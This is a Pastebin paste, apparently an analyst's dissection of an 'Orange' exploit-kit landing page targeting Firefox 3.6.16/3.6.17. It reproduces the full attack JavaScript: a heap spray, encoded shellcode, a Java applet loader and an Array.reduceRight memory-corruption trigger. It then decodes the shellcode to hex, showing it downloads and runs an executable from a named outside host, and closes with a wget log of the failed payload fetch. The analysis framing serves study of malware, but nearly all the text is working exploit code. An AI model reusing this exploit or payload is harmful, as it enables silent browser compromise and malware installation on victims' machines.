Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -----------------------------
- Firefox Agent Test for the Orange EK;
- It is proved it drops mess adjusting to my firefox browser
- -----------------------------
- document.write("
- <applet archive=\"27\" code=\"KiaDA.class\" width=\"8\" height=\"18\"><param name=\"ur34\"
- value=\"103!115!115!111!57!46!46!99!104!100!114!100!107!45!115!103!100!103!104!98!106!110
- !113!120!108!110!115!110!113!108!104!107!100!45!98!110!108!57!55!50!55!49!46!110!114!103!7
- 9!97!88!62!100!119!111!104!99!60!48!50!37!101!104!99!60!49!53\"><param name=\"enm3\" value
- =\"75!115!49!109!80!101!105!45!100!119!100\"></applet>");
- document.write("<object id=\"d\"><object>");
- document.write("<embed src=\"265\" width=\"508\" height=\"367\">");
- var myobject = document.getElementById('d');
- function GetUrl(){
- return "
- 103!115!115!111!57!46!46!99!104!100!114!100!107!45!115!103!100!103!104!98!106!110!113!120!
- 108!110!115!110!113!108!104!107!100!45!98!110!108!57!55!50!55!49!46!110!114!103!79!97!88!6
- 2!100!119!111!104!99!60!48!50!37!101!104!99!60!49!53";
- }
- ;
- function myescape(input){
- var output = '';
- ff = 255;
- f = 0;
- if (input.length % 2){
- f = 1;
- }
- for (var i = 0; i < input.length; i += 2){
- output += '%u';
- if (i == (input.length - 1)){
- output += 'ff';
- }
- else {
- output = output + input.charCodeAt(i + 1).toString(16);
- }
- output += input.charCodeAt(i).toString(16);
- }
- if (!f){
- output = output + '%uffff';
- }
- return output;
- }
- ;
- function spray(){
- var ptrs = unescape("
- %u0000%u0048%u0c00%u5864%u704e%u5349%u587a%u4157%u6844%u564a%u5143%u4359%u7674%u666c%u6a71
- %u5174%u4a69%u414e%u4166%u0000%u26f0%u104c%u5846%u426e%u0000%u240c%u3410%u007c%u0c00%u5326
- %u1005%u6379%u624a%u7959%u694f%u4663%u4445%u4261%u574b%u6666%u4d71%u7148%u4153%u4b47%u4244
- %u6f72%u5942%u655a%u784e%u4a66%u6a68%u4c67%u7879%u002e%u0c00");
- var bheader = 0x12 / 2;
- var nullt = 0x2 / 2;
- var scode = unescape("
- %u5eeb%u335f%u99c0%u6a50%ub201%u5745%uf78b%u23b2%udf8b%uda03%u46b2%uda03%ub253%u030a%u8bda
- %uaafb%u8b5b%u50fe%u5750%u45b2%ufa03%ub2aa%u0323%ub2fa%u030b%u80fa%u003f%u0175%u5747%u5050
- %ub057%u66ff%uffb9%uf2ff%u4fae%u07c6%u5f00%u8b58%ub2fe%u0346%u53fa%uc68b%u5e05%u0000%u5000
- %u5656%u466a%u02eb%u79eb%u6a57%u5930%u8b64%u8b01%u0c40%u688b%u8b1c%u085d%u6d8b%u5500%u438b
- %u8b3c%u1844%u0b78%u74c0%u8d31%u1874%uad18%uad91%uc303%uad50%u3c8d%uad03%u2c8d%u8b03%u8f74
- %u03fc%u33f3%u33c0%u99d2%u03ac%uc1d0%u05c2%u7948%u8bf7%u2474%u3b08%u7416%ue206%u58e2%ueb5d
- %u58ba%ub70f%u4d54%u03fe%u901c%u5f5d%ud3ff%uebab%u579d%u7c8b%u0824%u6650%uffb8%uf200%u4fae
- %uc033%u0788%u5f58%u04c2%ue800%uff22%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff
- %uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff
- %uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%u1529%u54d2%ufabd
- %u4c58%u70cc%u6b77%uf259%u23cb%u6664%u11b4%u1fb1%u1a3e%u6363%u6363%u6363%u652e%u6578%u7500
- %u6c72%u6f6d%u2e6e%u6c64%uff6c%u7468%u7074%u2f3a%u642f%u6569%u6573%u2e6c%u6874%u6865%u6369
- %u6f6b%u7972%u6f6d%u6f74%u6d72%u6c69%u2e65%u6f63%u3a6d%u3338%u3238%u6f2f%u6873%u6250%u3f59
- %u7865%u6970%u3d64%u3331%u6626%u6469%u323d%u36") + unescape(myescape(GetUrl()));
- var payload = unescape("
- %u6c6e%u706c%u454d%u7453%u4a45%u7554%u616b%u6561%u526f%u7573%u1806%u101f%u828c%u1083%u0d7b
- %u103e%u8002%u102d%u876b%u1003%u0001%u1004%u0001%u0000%u6917%u104e%u1000%u0000%uc000%u102a
- %u0040%u0000%u0005%u102e%uc001%u102a%u1806%u101f%u9090%u9090%u3401%u102b%u9090%u9090") +
- scode;
- var tr_padding = unescape("%u0c0c%u0c0c");
- while (tr_padding.length < 0x7fa00){
- tr_padding += tr_padding;
- }
- var dummy = ptrs + payload + tr_padding;
- var hspray = dummy.substring(0, 0x7fa00 - bheader - nullt);
- HeapBlocks = new Array();
- for (i = 0; i < 0x100; i ++ ){
- HeapBlocks[i] += hspray;
- }
- }
- ;
- if ((navigator.userAgent.indexOf("Firefox/3.6.16") != - 1) || (navigator.userAgent.
- indexOf("Firefox/3.6.17") != - 1)){
- spray();
- obj = new Array();
- obj.length = 2197815302;
- f = function trigger(prev, myobj, indx, array){
- alert(myobj[0]);
- }
- ;
- obj.reduceRight(f, 1, 2, 3);
- }
- -----------------------------
- Generating java applet:
- -----------------------------
- <applet archive="27" code="KiaDA.class" width="8" height="18">
- <param name="ur34" value= "103!115!115!111!57!46!46!99!104!100!114!100!107!45!115!103!100!103!104!98!106!110!113!120!108!110!115!110!113!108!104!107!100!45!98!110!108!57!55!50!55!49!46!110!114!103!79!97!88!62!100!119!111!104!99!60!48!50!37!101!104!99!60!49!53">
- <param name="enm3" value="75!115!49!109!80!101!105!45!100!119!100"></applet>
- ↑There goes the exploit
- -----------------------------
- Popping he below shellcode;
- -----------------------------
- eb 5e 5f 33 c0 99 50 6a 01 b2 45 57 8b f7 b2 23
- 8b df 03 da b2 46 03 da 53 b2 0a 03 da 8b fb aa
- 5b 8b fe 50 50 57 b2 45 03 fa aa b2 23 03 fa b2
- 0b 03 fa 80 3f 00 75 01 47 57 50 50 57 b0 ff 66
- b9 ff ff f2 ae 4f c6 07 00 5f 58 8b fe b2 46 03
- fa 53 8b c6 05 5e 00 00 00 50 56 56 6a 46 eb 02
- eb 79 57 6a 30 59 64 8b 01 8b 40 0c 8b 68 1c 8b
- 5d 08 8b 6d 00 55 8b 43 3c 8b 44 18 78 0b c0 74
- 31 8d 74 18 18 ad 91 ad 03 c3 50 ad 8d 3c 03 ad
- 8d 2c 03 8b 74 8f fc 03 f3 33 c0 33 d2 99 ac 03
- d0 c1 c2 05 48 79 f7 8b 74 24 08 3b 16 74 06 e2
- e2 58 5d eb ba 58 0f b7 54 4d fe 03 1c 90 5d 5f
- ff d3 ab eb 9d 57 8b 7c 24 08 50 66 b8 ff 00 f2
- ae 4f 33 c0 88 07 58 5f c2 04 00 e8 22 ff ff ff
- ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
- ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
- ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
- ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
- ff ff ff ff ff ff 29 15 d2 54 bd fa 58 4c cc 70
- 77 6b 59 f2 cb 23 64 66 b4 11 b1 1f 3e 1a 63 63
- 63 63 63 63 2e 65 78 65 00 75 72 6c 6d 6f 6e 2e
- 64 6c 6c ff 68 74 74 70 3a 2f 2f 64 69 65 73 65
- 6c 2e 74 68 65 68 69 63 6b 6f 72 79 6d 6f 74 6f
- 72 6d 69 6c 65 2e 63 6f 6d 3a 38 33 38 32 2f 6f
- 73 68 50 62 59 3f 65 78 70 69 64 3d 31 33 26 66
- 69 64 3d 32
- -----------------------------
- use kernel.dll & urlmon.dll
- -----------------------------
- target:
- http://diesel.thehickorymotormile.com:8382/oshPbY?expid=13&fid=2
- -----------------------------
- Download efforts...
- -----------------------------
- --19:26:05-- http://diesel.thehickorymotormile.com:8382/oshPbY?expid=13
- => `oshPbY@expid=13'
- Resolving diesel.thehickorymotormile.com... 173.212.222.188
- Connecting to diesel.thehickorymotormile.com|173.212.222.188|:8382... connected.
- HTTP request sent, awaiting response... 502 Bad Gateway
- -----------------------------
- Looks like the url is expired :-))
- -----------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement